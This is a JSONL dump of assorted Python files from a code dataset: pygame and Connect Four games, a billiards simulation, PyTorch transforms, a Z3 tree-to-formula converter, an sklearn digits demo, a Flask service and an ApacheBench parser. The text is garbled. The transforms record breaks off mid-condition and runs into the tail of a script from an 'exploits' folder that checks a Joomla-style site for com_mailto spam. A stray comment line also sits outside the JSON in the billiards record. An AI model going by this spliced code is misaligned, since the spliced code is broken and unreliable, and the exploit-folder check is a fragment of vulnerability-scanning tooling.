+{"seq_id":"351980456","text":"import pygame\nimport sprites\nlavasprites = pygame.sprite.Group()\ndoors = pygame.sprite.Group()\ntile_size = 25\nclass World():\n    def __init__(self, data):\n        self.tile_list = []\n        #load images\n        dirt_img = pygame.image.load('dirt.png')\n        grass_img = pygame.image.load('grass.png')\n        water_img = pygame.image.load('water.png')\n        row_count = 0\n        for row in data:\n            col_count = 0\n            for tile in row:\n                if tile ==1:\n                    img = pygame.transform.scale(dirt_img,(tile_size, tile_size))\n                    img_rect = img.get_rect()\n                    img_rect.x = col_count * tile_size\n                    img_rect.y = row_count * tile_size\n                    tile = (img, img_rect)\n                    self.tile_list.append(tile)\n                elif tile == 2:\n                    img = pygame.transform.scale(grass_img,(tile_size, tile_size))\n                    img_rect = img.get_rect()\n                    img_rect.x = col_count * tile_size\n                    img_rect.y = row_count * tile_size\n                    tile = (img, img_rect)\n                    self.tile_list.append(tile)\n                elif tile == 3:\n                    tilelava = sprites.lavasprite(col_count * tile_size, row_count * tile_size)\n                    lavasprites.add(tilelava)\n                elif tile == 4:\n                    tiledoor = sprites.flag(col_count * tile_size, row_count * tile_size)\n                    doors.add(tiledoor)\n                col_count += 1\n            row_count += 1\n\n    def draw(self, screen):\n        for tile in self.tile_list:\n            screen.blit(tile[0],tile[1])\n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"77906105","text":"import random\nfrom math import *\nimport datetime\n\n\nclass Ball(object):\n    dt = 0.1\n\n    def __init__(self, idd):\n        self.vx0 = -1\n        self.vy0 = -1\n        self.x0 = -1\n        self.y0 = -1\n
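        # -1 is a sentinel: positions are assigned later by Table.setInitialBallsPositions, velocities by setInitialBallVelocity()\n        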
self.vx = -1\n        self.vy = -1\n        self.x = -1\n        self.y = -1\n        self.R = 25\n        self.id = idd # ball id\n        self.collisionBallNr = 99999\n        self.ifCollisionCompleted = False\n        self.color = \"blue\"\n        self.setInitialBallVelocity()\n\n    def nextStep(self):\n        self.x = self.x + self.vx * Ball.dt\n        self.y = self.y + self.vy * Ball.dt\n\n    def ifCollisionWithBall(self, balls): # set new velocities after collision\n\n        Xcoll = 0\n        Ycoll = 0\n        distanceFromBall = 99999\n        for i in balls:\n            if i.id != self.id:\n                distanceFromBall = sqrt((self.x - i.x) ** 2 + (self.y - i.y) ** 2)\n                if distanceFromBall <= 2 * self.R and self.ifCollisionCompleted == False:\n                    self.collisionBallNr = i.id\n                    Xcoll = (self.x + i.x) / 2\n                    Ycoll = (self.y + i.y) / 2\n                    alpha = 3.14159 / 2 - atan(float(self.y - i.y) / (self.x - i.x)) # collision angle\n\n                    Vs = cos(alpha) * self.vx - sin(alpha) * self.vy\n                    Vn = sin(alpha) * self.vx + cos(alpha) * self.vy\n                    Vs_i = cos(alpha) * i.vx - sin(alpha) * i.vy\n                    Vn_i = sin(alpha) * i.vx + cos(alpha) * i.vy\n                    Vn_po = Vn_i\n                    Vni_po = Vn\n                    self.vx = cos(alpha) * Vs + Vn_po * sin(alpha)\n                    self.vy = cos(alpha) * Vn_po - sin(alpha) * Vs\n                    i.vx = cos(alpha) * Vs_i + Vni_po * sin(alpha)\n                    i.vy = cos(alpha) * Vni_po - sin(alpha) * Vs_i\n                    # print(\"Vx after:\",self.vx, \"Vy=\",self.vy,\"Vxi=\",i.vx,\" Vyi=\",i.vy)\n\n                    i.ifCollisionCompleted = True\n                    self.ifCollisionCompleted = True\n                elif distanceFromBall > 2 * self.R and self.ifCollisionCompleted == True and i.id == self.collisionBallNr:\n                    # print(datetime.datetime.now(), \"ELSE distance from ball id {0}: \".format(i.id), distanceFromBall)\n                    self.ifCollisionCompleted = False\n                    i.ifCollisionCompleted = False\n\n    def ifCollisionWithEdge(self):\n        if self.x + self.R >= Table.borderCoordinatesX[1] and self.vx > 0:\n            self.vx = -self.vx\n        if self.x - self.R <= Table.borderCoordinatesX[0] and self.vx < 0:\n            self.vx = -self.vx\n        if self.y - self.R <= Table.borderCoordinatesY[0] and self.vy < 0:\n            self.vy = -self.vy\n        if self.y + self.R >= Table.borderCoordinatesY[1] and self.vy > 0:\n            self.vy = -self.vy\n\n    def setInitialBallVelocity(self):\n        self.vx0 = random.randint(-10, 10)\n        self.vy0 = random.randint(-10, 10)\n        self.vx = self.vx0\n        self.vy = self.vy0\n\n\nclass Table(object):\n    L = 500 # table size\n    W = 400\n    borderCoordinatesX = [0, L] # border coordinates of the table\n    borderCoordinatesY = [0, W]\n    colors = ['yellow', 'blue', 'red', 'green', 'white', 'grey', 'purple', 'black', 'brown', 'orange', 'yellow', 'blue',\n              'red', 'green', 'white', 'grey', 'purple', 'black', 'brown', 'orange']\n\n    def __init__(self, Nn, dtt):\n        self.N = Nn # number of balls\n        self.dt = dtt # time step size\n        Ball.dt = dtt\n        self.balls = [Ball(i) for i in range(self.N)]\n        for i in range(0, self.N):\n            self.balls[i].color = self.colors[i]\n        self.initialBallsPositions = {} # have to be unique for each ball\n        self.initialBallsVelocities = {} # keep velocities in their own dict so positions are not overwritten\n        self.setInitialBallsPositions(self.balls)\n        self.getInitialPositionsAndVelocities(self.balls)\n\n    def setInitialBallsPositions(self, balls):\n\n        for i in balls:\n            while i.x0 == -1 and i.y0 == -1:\n                x = random.randint(i.R, Table.L - i.R)\n                y = random.randint(i.R, Table.W - i.R)\n                for j in balls:\n                    if i.id != j.id and x <= (j.x + 2 * j.R) and y <= (j.y + 2 * j.R) and x >= (\n                            j.x - 2 * j.R) and y >= (j.y - 2 * j.R):\n                        x = -1\n                        y = -1\n                i.x0 = x\n                i.y0 = y\n            i.x = i.x0\n            i.y = i.y0\n\n    def getInitialPositionsAndVelocities(self, balls):\n\n        for i in range(self.N):\n            self.initialBallsPositions[balls[i].color] = [balls[i].x, balls[i].y]\n            self.initialBallsVelocities[balls[i].color] = [balls[i].vx0, balls[i].vy0]\n        print(\"Initial balls positions: \", self.initialBallsPositions)\n        print(\"Initial balls velocities: \", self.initialBallsVelocities)\n\n    def actualVelocity(self, ballNr, t):\n\n        return [self.balls[ballNr].vx, self.balls[ballNr].vy]\n\n    def actualPosition(self, ballNr, t):\n\n        for i in range(0, self.N):\n            self.balls[i].nextStep()\n            self.balls[i].ifCollisionWithEdge()\n            self.balls[i].ifCollisionWithBall(self.balls)\n        return [self.balls[ballNr].x, self.balls[ballNr].y]\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pool2D.py","file_name":"pool2D.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"32409146","text":"\"\"\"\n    Connect Four v3 Work in Progress (W.I.P.). Programmed by Jolyon Shah.\n\"\"\"\n\nimport random\nimport time\n\n\n# Displays the board.\ndef display_board(board):\n    \"\"\"\n    Displays the board as a nice grid.\n    \"\"\"\n\n    # Prints the initial column headings first.\n    print (\"\\n 1 2 3 4 5 6 7\")\n    print (\" -----------------------------\")\n\n    for row in range(0,6):\n        print (\" \", end = \"\")\n        # Prints each row, one at a time.\n        for col in range(0,7):\n            print (\"| %s \" % (board[row][col]), end=\"\")\n\n        print (\"|\\n -----------------------------\")\n\n    return None\n\n\n\n# Copies an array so as to make sure that there are no problems with mutability.\ndef copy_array(array):\n    \"\"\"\n    Copies an array (lists in lists) using the 'slice' method.\n    \"\"\"\n    return [array[x][:] for x in range(0,len(array))]\n\n\n# Returns the alternate player, such that if \"X\" is the input, \"O\" is the output, and vice versa.\ndef alt_player(player):\n    \"\"\"\n    Returns the other player, so if the input is \"X\", then the output is \"O\", and\n    vice versa.\n    \"\"\"\n    return \"X\" if player == \"O\" else \"O\"\n\n\n# Given a column heading, this will perform the move.\ndef set_move(board, column, player):\n    \"\"\"\n    This will make a move given the board, the column and the player.\n    \"\"\"\n    # This loop will search the board from bottom up for a clear spot.\n    for row in range (5,-1,-1):\n        if board[row][column] == \" \":\n            board[row][column] = player\n            break\n\n    return board\n\n\n# Obtains a column for the move that the player is to make.\ndef player_move(board, player):\n    \"\"\"\n    Takes a move from a human player and outputs it, returning it as the list\n    index as opposed to the raw number (column 1 is 0, etc).\n    \"\"\"\n    # Generates a moveset of possible columns that have at least the top spot free.\n    moveset = [str(x+1) for x in range(0,7) if board[0][x] == \" \"]\n    column = \"None\"\n\n    # This loop takes the player's move and ensures that it is within the possible moveset.\n    while column not in moveset:\n        column = input(\"Move: \")\n\n    return int(column)-1\n\n\n# The computer's move - outputs the 'best' column, as calculated by a minimax algorithm.\ndef npc_move(player, board, depth, debug=False):\n    \"\"\"\n    'Non-Playable-Character' (NPC)'s move. Uses a minimax given the player,\n    the board, the depth to test to, and debug, whereby True outputs some\n    extra debugging information about the final scoring of the board.\n    \"\"\"\n    \n    # This function is designed to call itself as it checks to the specified depth.\n    def depth_check(player, board, depth, count):\n        \"\"\"\n        This function is designed to call itself in order to test a user-specified\n        depth. 
This will return the score at the 'deep end' of the check, unless\n        a win is detected earlier, in which case the win score will be returned instead.\n        The scores for each column are output as a list.\n        \"\"\"\n        # Creates some initial stats for the iterations to run off.\n        move_set = [x for x in range(0,7) if board[0][x] == \" \"]\n        move_count = len(move_set)\n        move_scores = [0 for x in range(0,move_count)]\n\n        # This loop will test every possible move for the given depth (up to 7).\n        for n in range (0,move_count):\n            test_board = set_move(copy_array(board), move_set[n], player if (count%2 == 0) else alt_player(player))\n            move_scores[n] = score_board(test_board, player) * depth\n            # This determines whether the next depth for a given possible move needs exploring.\n            if len([x for x in range(0,6) if \" \" in test_board[x]]) > 0 and depth > 1 and abs(move_scores[n]) < 1e10:\n                deeper_scores = depth_check(player, test_board, depth-1, count+1)\n                move_scores[n] = min(deeper_scores) if count%2 == 0 else max(deeper_scores)\n\n        return move_scores\n\n\n    surface_move_set = [x for x in range(0,7) if board[0][x] == \" \"]\n    # This generates the final move scores, and sets them to 0 if no depths are looked at.\n    if depth > 0:\n        surface_move_scores = depth_check(player, board, depth, 0)\n    else:\n        surface_move_scores = [0 for x in range(len(surface_move_set))]\n    # Whilst choosing the first move in the list that is optimal would work, randomising between them gives a little more variation.\n    best_move_set = [surface_move_set[x] for x in range(0,len(surface_move_set)) if surface_move_scores[x] == max(surface_move_scores)]\n    random.shuffle(best_move_set)\n    # This section is included to help with debugging by seeing what moves the computer values.\n    if debug is True:\n        print (\"Possible moves: %s\" % (surface_move_set))\n        print (\"Move scores: %s\" % (surface_move_scores))\n        print (\"Considered moves: %s\" % (best_move_set))\n\n    return best_move_set[0]\n\n\n# Scores the board, giving higher scores to better boards for the player.\ndef score_board(board, player):\n    \"\"\"\n    Scores the board for a given player.\n    Points are allocated depending on how many possible wins there are.\n    1 for 1 piece + 3 spaces;\n    100 for 2 pieces + 2 spaces;\n    10000 for 3 pieces + 1 space;\n    1e10 for 4 pieces in a row (win).\n    \"\"\"\n    score = 0\n    POINTS = [0,1,100,10000,1e10]\n    chain = []\n\n    # Checks for horizontal chains first.\n    for row in range(0,6):\n        for col in range(0,4):\n            chain = board[row][col:col+4]\n            if not (\"X\" in chain and \"O\" in chain):\n                score = score+POINTS[chain.count(player)] if player in chain else score-POINTS[chain.count(alt_player(player))]\n\n    # Checks for vertical chains.\n    for row in range(0,3):\n        for col in range(0,7):\n            chain = [board[row+x][col] for x in range(0,4)]\n            if not (\"X\" in chain and \"O\" in chain):\n                score = score+POINTS[chain.count(player)] if player in chain else score-POINTS[chain.count(alt_player(player))]\n\n    # Checks for diagonals from top left to bottom right.\n    for row in range(0,3):\n        for col in range(0,4):\n            chain = [board[row+x][col+x] for x in range(0,4)]\n            if not (\"X\" in chain and \"O\" in chain):\n                score = score+POINTS[chain.count(player)] if player in chain else score-POINTS[chain.count(alt_player(player))]\n\n    # Checks for diagonals from top right to bottom left.\n    for row in range(0,3):\n        for col in range(3,7):\n            chain = [board[row+x][col-x] for x in range(0,4)]\n            if not (\"X\" in chain and \"O\" in chain):\n                score = score+POINTS[chain.count(player)] if player in chain 
else score-POINTS[chain.count(alt_player(player))]\n\n    return score\n\n\n# This function generates a simple menu to make the management of options a little easier.\ndef get_option(title, contents, start_number=1):\n    \"\"\"\n    This function takes the input as a string for the title, a list of strings with\n    each item as a selectable option from the menu, and start_number, which is what the\n    first number in the menu should be (such that 1 will have 1,2,3, etc).\n    It will output an integer.\n    \"\"\"\n    print (\"\\n= - = - = %s = - = - =\\n\" % (title))\n\n    # This displays the entries, each with their own row and number.\n    for entry in range(0,len(contents)):\n        print (\" - %s: %s\" % (entry+start_number, contents[entry]))\n\n    # This set lists the possible numbers for the user to choose from.\n    menu_set = [str(x+start_number) for x in range (0,len(contents))]\n    user_option = \"None\"\n\n    while user_option not in menu_set:\n        user_option = input(\"Number: \")\n\n    return int(user_option)\n\n# The main menu will greet the player upon opening the program.\nMAIN_MENU_TITLE = \"Connect Four Main Menu\"\nMAIN_MENU_CONTENTS = [\n    \"Two Player: Play against another human player.\",\n    \"One Player: Play against the computer, choosing your difficulty setting.\",\n    \"Zero Player: Watch the computer play against itself, choosing both difficulty settings.\"\n    ]\n\n# The AI_MENU_TITLE has an open ending so that it can be changed easily.\nAI_MENU_TITLE = \"Connect Four Difficulty Menu for player \"\nAI_NAMES = [\"Random\",\"Terrible\",\"Average\",\"Adept\",\"Intelligent\",\"Expert\"]\nAI_MENU_CONTENTS = [\n    \"%s: The computer's moves will be made completely randomly.\" % (AI_NAMES[0]),\n    \"%s: The computer doesn't really think ahead. This should be easy.\" % (AI_NAMES[1]),\n    \"%s: The computer plays with a little skill. Most people would win here.\" % (AI_NAMES[2]),\n    \"%s: The computer plays with reasonable skill. You can win, but just as likely lose.\" % (AI_NAMES[3]),\n    \"%s: The computer plays well, and winning here will require skill or a lot of luck.\" % (AI_NAMES[4]),\n    \"%s: To win here consistently requires considerable skill. 
Not for beginners.\" % (AI_NAMES[5])\n ]\n\nprint (\"\\n\\n========================| Connect Four v3 by Jolyon Shah |========================\\n\\n\")\n\nreplay = True\n\nreset = True\n\nwhile replay is True:\n\n # Initialises some starting variables that reset for every game.\n board = [[\" \" for y in range(0,7)] for x in range(0,6)]\n player = \"O\" if random.randint(0,1) == 0 else \"X\"\n winner = 0\n\n # Resets the options if requested, or if the first time.\n if reset is True:\n player_scores = [0,0]\n player_one = \"Human Player One\"\n player_two = \"Human Player Two\"\n game_mode = get_option(MAIN_MENU_TITLE, MAIN_MENU_CONTENTS, 1)\n\n # This sets up the names to be displayed, as well as the difficulties for the computer players.\n if game_mode == 1:\n player_one = input(\"Please enter Player One's (X) name: \") + \" (X)\"\n player_two = input(\"Please enter Player Two's (O) name: \") + \" (O)\"\n\n elif game_mode == 2:\n player_one = input(\"Please enter Player One's (X) name: \") + \" (X)\"\n computer_two = get_option(AI_MENU_TITLE+\"two\", AI_MENU_CONTENTS, 0)\n player_two = AI_NAMES[computer_two] + \" (O)\"\n\n elif game_mode == 3:\n computer_one = get_option(AI_MENU_TITLE+\"one\", AI_MENU_CONTENTS, 0)\n player_one = AI_NAMES[computer_one] + \" (X)\"\n computer_two = get_option(AI_MENU_TITLE+\"two\", AI_MENU_CONTENTS, 0)\n player_two = AI_NAMES[computer_two] + \" (O)\"\n\n # A few extra options.\n sleep = input(\"Would you like an added delay of one second between the computer's moves? Y/N \").lower().startswith(\"y\")\n debug = input(\"Would you like to enable debug mode? Y/N \").lower().startswith(\"y\")\n\n # Displays the board for the first time.\n print (\"\\n======================================\")\n display_board(board)\n print (\"\\n======================================\")\n\n while winner < 1e9:\n\n # Alternates the player and displays the current player's turn.\n player = alt_player(player)\n print (\"%s's turn!\" % (player_one if player == \"X\" else player_two))\n\n # Performs a move for the current player. Gamemodes 1 and 2 have a human as Xs, and gamemode 1 has a human as Os.\n if player == \"X\":\n if game_mode in [1,2]:\n move = player_move(board, player)\n board = set_move(board, move, player)\n else:\n if sleep is True:\n time.sleep(1)\n move = npc_move(player, board, computer_one, debug)\n board = set_move(board, move, player)\n\n else:\n if game_mode == 1:\n move = player_move(board, player)\n board = set_move(board, move, player)\n else:\n if sleep is True:\n time.sleep(1)\n move = npc_move(player, board, computer_two, debug)\n board = set_move(board, move, player)\n\n # Outputs the move that was just made.\n print (\"======================================\\n\")\n print (\"%s moved to column %s.\" % (player_one if player == \"X\" else player_two, move+1))\n display_board(board)\n print (\"\\n======================================\")\n\n winner = score_board(board, player)\n\n # This checks for draws.\n if len([x for x in range(0,6) if \" \" not in board[x]]) == 6:\n print (\"Stalemate! Nobody wins!\")\n break\n\n # This next section handles the winner.\n if winner > 1e9:\n if player == \"X\":\n player_scores[0] += 1\n print (\"%s wins! Well done!\" % (player_one))\n print (\"Better luck next time, %s\" % (player_two))\n else:\n player_scores[1] += 1\n print (\"%s wins! 
Well done!\" % (player_two))\n print (\"Better luck next time, %s\" % (player_one))\n\n print (\"\\nScores:\")\n print (\"%s: %s wins\" % (player_one, player_scores[0]))\n print (\"%s: %s wins\" % (player_two, player_scores[1]))\n\n replay = input(\"Would you like to play again? Y/N \").lower().startswith(\"y\")\n\n if replay is True:\n reset = input(\"Would you like to reset scores and settings? Y/N \").lower().startswith(\"y\")\n\n\nprint (\"\\n\\n=-=-=-=-=-=-=-=-=-=-=-= Thank you for playing! =-=-=-=-=-=-=-=-=-=-=-=\\n\\n\")\n","sub_path":"Running Code (Python).py","file_name":"Running Code (Python).py","file_ext":"py","file_size_in_byte":13241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"470305744","text":"import os\nimport torch\nimport pandas as pd\nfrom skimage import io,transform\nimport numpy as np\nfrom torch.utils.data import Dataset,DataLoader\nfrom torchvision import transforms,utils\nimport matplotlib.pyplot as plt\nfrom torchvision.transforms import functional as G\nimport random\nfrom PIL import Image\n\n\n\nclass Rescale(object):\n def __init__(self,output_size,process):\n assert isinstance(output_size,tuple)\n self.output_size=output_size\n self.process=process\n \n def __call__(self,sample):\n img,annotation=sample['img'],sample['annotation']\n \n new_h,new_w=self.output_size\n new_h,new_w=int(new_h),int(new_w)\n \n if self.process=='training':\n img=transform.resize(img,(new_h,new_w))\n annotation=transform.resize(annotation,(new_h,new_w))\n return {'img':img,'annotation':annotation}\n\n elif self.process=='validation':\n img=transform.resize(img,(new_h,new_w))\n annotation=transform.resize(annotation,(new_h-184,new_w-184))\n return {'img':img,'annotation':annotation}\n \n \n else:\n print('input the process parameter as training/validation.')\n \n \n\n \nclass RandomCrop(object):\n def __init__(self,output_size):\n assert isinstance(output_size,tuple)\n self.output_size=output_size\n \n def __call__(self,sample):\n img,annotation=sample['img'],sample['annotation']\n \n h,w=img.shape[:2]\n new_h,new_w=self.output_size\n \n top=np.random.randint(0,h-new_h)\n left=np.random.randint(0,w-new_w)\n \n img=img[top:top+new_h,left:left+new_w]\n annotation=annotation[top:top+new_h,left:left+new_w]\n annotation=transform.resize(annotation,(new_h-184,new_w-184))\n \n return {'img':img,'annotation':annotation} \n \n \nclass Random_Vertical_Flip(object):\n def __init__(self,p=0.5):\n self.p=p\n \n def __call__(self,sample):\n img,annotation=sample['img'],sample['annotation']\n \n if random.random()= 0:\n sResult = 'com_mailto spam detected'\nelse:\n sResult = 'OK'","sub_path":"exploits/1.5.x/com_mailto_spam.py","file_name":"com_mailto_spam.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"549847893","text":"import time\nfrom z3 import *\nimport copy\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nX=Int('X')\nX1=Int('X1')\n\nDT=TreeNode(X%2==0)\nDT.left=TreeNode(\"False\")\nDT.right=TreeNode(X1%2==0)\nDT.right.right=TreeNode(\"True\")\nDT.right.left=TreeNode(\"False\")\n\ndef tree2Expr(DT) -> str:\n # 结点时术语\n if DT == True: #假设的是pts为空 将树默认设置为True\n return \"True\"\n expr = \"\"\n if(type(DT.val)==type(\"False\")):\n # print(DT.val)\n return DT.val\n if (type(DT.val) == type(X == X1)):\n expr = \"If(\"+str(DT.val)+\",\"+tree2Expr(DT.left) +\",\"+tree2Expr(DT.right)+\")\"\n 
if(type(DT.val) == type(X) or type(DT.val) == type(0)):\n        expr = str(DT.val)\n    return expr\ndef tree2LossingFormula(DT)->str:\n    t2ftime = time.time()\n    paths=[] # stores one complete path as And(,,,)\n    # if there is more than one path, Or(,,,) them together\n    stack=[] # the stack is implemented with a Python list; it holds tree nodes\n    p=DT\n    pre=None\n    while(p!=None or len(stack)!=0):\n        # walk down to the leftmost node; p is a non-empty predicate\n        while(p!=None and type(p.val)!=type(\"term\")):\n            stack.append(p)\n            p=p.left\n        \n        # at this point p must be a leaf node\n        if p !=None and p.val==\"True\": \n            if len(stack)==1:\n                paths.append(stack[0].val)\n            else:\n                expr=\"And(\"\n                for i in stack:\n                    # print(i.val)\n                    expr=expr+str(i.val)+\",\"\n                expr=expr[0:len(expr)-1]+\")\"\n                paths.append(expr)\n        \n        # for i in paths:\n        #     print(i) \n        p=stack.pop() # p.left is a term\n        # if the right child is a leaf node, or it has already been visited\n        if(type(p.right.val)==type(\"term\") or p.right==pre):\n            if(type(p.right.val)==type(\"term\") and p.right.val==\"True\"):\n                p.val=Not(p.val)\n                stack.append(p)\n                print(len(stack))\n                if len(stack)==1:\n                    paths.append(stack[0].val)\n                else:\n                    expr=\"And(\"\n                    for i in stack:\n                        # print(i.val)\n                        expr=expr+str(i.val)+\",\"\n                    expr=expr[0:len(expr)-1]+\")\"\n                    paths.append(expr) \n                stack=stack[:-1] \n            pre=p\n            p=None\n        else:\n            # not a leaf node\n            p.val=Not(p.val)\n            stack.append(p)\n            p=p.right\n    if len(paths)==1:\n        print(\"time taken to convert the tree to a formula:\",time.time()-t2ftime)\n        return str(paths[0])\n    else:\n        expr=\"Or(\"\n        for i in paths:\n            expr=expr+str(i)+\",\"\n        # there is one extra comma at the end\n        expr=expr[0:len(expr)-1]+\")\"\n        print(\"time taken to convert the tree to a formula:\",time.time()-t2ftime)\n        return expr\n\n# def tree2Formula(DT)->str:\n#     def bfs(root,path):\n#         if not root:return\n#         if not root.left and not root.right:\n#             # leaf node is True\n#             if root.val==\"True\":\n#                 # print(path)\n#                 if len(path)==1:\n#                     paths.append(path[0].val)\n#                 else:\n#                     expr=\"And(\"\n#                     for i in path:\n#                         # print(i.val)\n#                         expr=expr+i+\",\"\n#                     expr=expr[0:len(expr)-1]+\")\"\n#                     paths.append(expr) \n#         # not a leaf node\n#         else:\n#             path1=copy.deepcopy(path)\n#             path.append(str(root.val))\n#             bfs(root.left,path)\n#             path1.append((\"Not(\"+str(root.val)+\")\"))\n#             bfs(root.right,path1)\n#     paths=[]\n#     path=[]\n#     bfs(DT,path)\n#     if len(paths)==1:\n#         return str(paths[0])\n#     else:\n#         expr=\"Or(\"\n#         for i in paths:\n#             expr=expr+str(i)+\",\"\n#         expr=expr[0:len(expr)-1]+\")\"\n#         return expr \n\n\nprint(tree2Expr(DT))\nprint(tree2LossingFormula(DT))\n# print(simplify(eval(tree2Formula(DT))))","sub_path":"731/exampleTest/tree2for.py","file_name":"tree2for.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"217018496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug  2 11:01:27 2019\n\n@author: Narink\n\"\"\"\nfrom sklearn import svm, datasets, neural_network, metrics\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\n\ndigits=datasets.load_digits()\nprint(digits.images.shape)\nprint(digits.images[4])\n#print(type(digits.images[0]))\nplt.subplot(121)\nplt.imshow(digits.images[4])\nplt.subplot(122)\nplt.imshow(digits.images[4],cmap=plt.cm.gray_r)\n\nimagereshape=digits.images.reshape(len(digits.images),-1)\nprint(digits.images.shape)\nprint(imagereshape.shape)\nprint(digits.target.shape)\nxtrain,xtest,ytrain,ytest=train_test_split(imagereshape,digits.target,test_size=0.2)\nsvcnaja=svm.SVC(gamma='scale')\nsvcnaja.fit(xtrain,ytrain)\nypredict=svcnaja.predict(xtest)\n\nprint(metrics.confusion_matrix(ytest,ypredict))\nprint(svcnaja.score(xtest,ytest))\n\nimg_label=list(zip(digits.images,digits.target))\n#print(img_label)\nfor index,(img,label) in enumerate(img_label[:4]): \n    
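# plot the first four digits alongside their target labels\n    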
plt.subplot(4,1,index+1)\n plt.title(label)\n plt.imshow(img,cmap=plt.cm.gray_r)","sub_path":"PreML/testpic.py","file_name":"testpic.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"360672111","text":"from flask import Flask, jsonify, request\nfrom threading import Lock\n\napp = Flask(__name__)\n\npositionLock = Lock()\nposition = None\n\n@app.route('/')\ndef status():\n return 'Robot Updates Service Running...'\n\n@app.route('/robot_position', methods=['GET', 'POST'])\ndef robot_position():\n global position\n ret = jsonify('')\n positionLock.acquire()\n if request.method == 'GET':\n ret = position\n else:\n position = request.form\n positionLock.release()\n return ret\n\napp.run(host='127.0.0.1', port= 5000)","sub_path":"social-robot-new/src/robotUpdatesService.py","file_name":"robotUpdatesService.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"333561476","text":"#!/usr/bin/env python3\nimport argparse\nimport collections\nimport enum\nimport re\nimport subprocess\n\nTEST_REPETITION = 3 # repeat each test 3 times and get average\nCOLUMN_ORDER = (\n 'Server Software',\n 'Server Hostname',\n 'Server Port',\n 'Document Path',\n 'Document Length',\n 'Concurrency Level',\n 'Time taken for tests',\n 'Complete requests',\n 'Failed requests',\n 'Non-2xx responses',\n 'Total transferred',\n 'HTML transferred',\n 'Requests per second',\n 'Time per request',\n 'Time per request',\n 'Transfer rate'\n)\n\nTestResult = collections.namedtuple('TestResult', ['commit',\n 'cpu_time',\n 'mem_usage',\n 'worker_time',\n 'ab_fields',\n 'ab_raw'])\nABResult = collections.namedtuple('ABResult', ['commit', 'fields', 'raw'])\nABField = collections.namedtuple('ABField', ['field_text', 'value_text',\n 'name', 'value', 'value_suffix'])\n\n\nclass ABOutTypes(enum.Enum):\n default = 'default'\n\n\ndef parse_default_number(text, value):\n match = re.match(r'([\\d.]+)(.*)', value)\n\n if not match:\n raise ValueError('Value does not contain a number.')\n\n return ABField(field_text=text, value_text=value,\n name=text, value=float(match.group(1)),\n value_suffix=match.group(2))\n\n\ndef parse_default(text, value):\n return ABField(field_text=text, value_text=value,\n name=text, value=value, value_suffix='')\n\n\ndef parse_ab_out(out, type_=ABOutTypes.default):\n field_regex = re.compile(r'\\s*(.+?)\\s*:\\s*(.*)\\s*')\n\n result = []\n\n for i, line in enumerate(out.splitlines()):\n line = line.strip()\n if i < 7 or not line:\n continue\n\n match = field_regex.match(line)\n\n if not match:\n continue\n\n field_text, value_text = match.group(1), match.group(2)\n\n if field_text not in COLUMN_ORDER:\n continue\n\n try:\n ab_field = parse_default_number(field_text, value_text)\n except ValueError:\n ab_field = parse_default(field_text, value_text)\n\n result.append(ab_field)\n\n return result\n\n\ndef prettify_test_result(test_result):\n assert isinstance(test_result, TestResult)\n\n result = ''\n\n result += 'CPU time: {0}\\n'.format(test_result.cpu_time)\n result += 'Memory usage: {0}\\n'.format(test_result.mem_usage)\n result += 'Worker time: {0}\\n'.format(test_result.worker_time)\n\n for ab_field in test_result.ab_fields:\n if ab_field.value_suffix == ' [ms] (mean)':\n result += 'Time per request [ms] (mean): {0}\\n'.format(ab_field.value) # noqa\n elif ab_field.value_suffix == ' [ms] (mean, across all concurrent 
requests)': # noqa\n result += 'Time per request [ms] (mean, across all concurrent requests): {0}\\n'.format(ab_field.value) # noqa\n else:\n result += '{0}: {1}\\n'.format(ab_field.name, ab_field.value)\n\n return result\n\n\ndef calc_tests_avr(test_results):\n # TODO add asserts\n\n result_ab_fields = []\n sum_time_taken = 0\n sum_reqs_per_sec = 0\n sum_time_per_req_mean = 0\n sum_time_per_req_mean_total = 0\n sum_transfer_rate = 0\n\n for test_result in test_results:\n time_taken_field = next(filter(\n lambda ab_field: ab_field.name == 'Time taken for tests',\n test_result.ab_fields\n ))\n reqs_per_sec_field = next(filter(\n lambda ab_field: ab_field.name == 'Requests per second',\n test_result.ab_fields\n ))\n time_per_req_mean_field = next(filter(\n lambda ab_field: ab_field.value_suffix == ' [ms] (mean)',\n test_result.ab_fields\n ))\n time_per_req_mean_total_field = next(filter(\n lambda ab_field: ab_field.value_suffix == ' [ms] (mean, across all concurrent requests)', # noqa\n test_result.ab_fields\n ))\n transfer_rate_field = next(filter(\n lambda ab_field: ab_field.name == 'Transfer rate',\n test_result.ab_fields\n ))\n\n sum_time_taken += time_taken_field.value\n sum_reqs_per_sec += reqs_per_sec_field.value\n sum_time_per_req_mean += time_per_req_mean_field.value\n sum_time_per_req_mean_total += time_per_req_mean_total_field.value\n sum_transfer_rate += transfer_rate_field.value\n\n sample_result = test_results[0]\n\n for field in sample_result.ab_fields:\n if field.name == 'Time taken for tests':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_time_taken / len(test_results)\n ))\n elif field.name == 'Requests per second':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_reqs_per_sec / len(test_results)\n ))\n elif field.value_suffix == ' [ms] (mean)':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_time_per_req_mean / len(test_results)\n ))\n elif field.value_suffix == ' [ms] (mean, across all concurrent requests)': # noqa\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_time_per_req_mean_total / len(test_results)\n ))\n elif field.name == 